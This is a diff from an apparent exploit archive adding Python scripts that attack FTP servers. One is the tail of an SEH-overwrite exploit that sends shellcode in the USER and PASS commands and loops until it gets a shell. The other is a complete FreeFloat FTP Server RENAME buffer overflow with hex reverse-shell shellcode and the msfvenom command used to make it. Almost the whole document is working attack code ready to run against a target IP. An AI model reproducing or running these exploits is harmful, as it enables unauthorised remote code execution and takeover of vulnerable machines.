+        "xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc"
+        "VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ"
+        "yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb"
+        "8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9"
+        "op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP"
+        "qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq"
+        "Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6"
+        "GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm"
+        "sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3"
+        "ioJuAA"
+    )
+    
+    # Final payload, SEH overwrite ocurrs at 600 bytes
+    payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
+    try:
+        s = socket.create_connection((ipaddr, 21))
+        s.send("USER "+ payload +"\r\n" )
+        print s.recv(4096)
+        
+        s.send("PASS "+ payload +"\r\n" )
+        print s.recv(4096)
+        print s.recv(4096)
+    except e:
+        print str(e)
+        exit("[+] Couldn't connect")
+            
+if __name__ == "__main__":
+    ipaddr = raw_input("[+] IP: ")
+    doHavoc(ipaddr)
+    while raw_input("[?] Got shell?(y/n) ").lower() == "n":
+        doHavoc(ipaddr)
+    print "[+] Enjoy..."

platforms/windows/remote/40677.py

@@ -0,0 +1,60 @@
+#!/usr/bin/env python      
+# -*- coding: utf-8 -*-
+
+# Exploit Title:  FreeFloat FTP Server RENAME Command Buffer Overflow Exploit
+# Date:           29/10/2016
+# Exploit Author: Eagleblack
+# Software Link:  http://www.freefloat.com/software/freefloatftpserver.zip
+# Version:        1.00
+# Tested on:      Windows XP Profesional SP3 Spanish version x86
+# CVE :           N/A
+
+#Description:     FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a 
+#                 long  chain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry
+#		  he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain
+#		  a remote code execution on the system that is running the FTP Server, in this case Windows XP.
+
+import socket 
+ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer
+
+#Metasploit shellcode: 
+#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
+
+shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
+"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
+"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
+"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
+"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
+"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
+"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
+"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
+"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
+"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
+"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
+"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
+"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
+"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
+"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
+"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
+"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
+"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
+"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
+"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
+"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
+"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
+"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
+"\x33\x93\xbd\x45\x33\xb6") 
+
+buffer =  '\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245
+print "Sending Buffer"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
+connect = s.connect(('192.168.1.13',21))              #IP address and port (21) from the target
+s.recv(1024)                                          #FTPBanner
+s.send('USER \r\n')                                   #Sending USER (Null user)
+s.recv(1024) 
+s.send('PASS \r\n')                                   #Sending Password (Null password)
+s.recv(1024)
+s.send('RENAME' + buffer +'\r\n')
+s.close()
+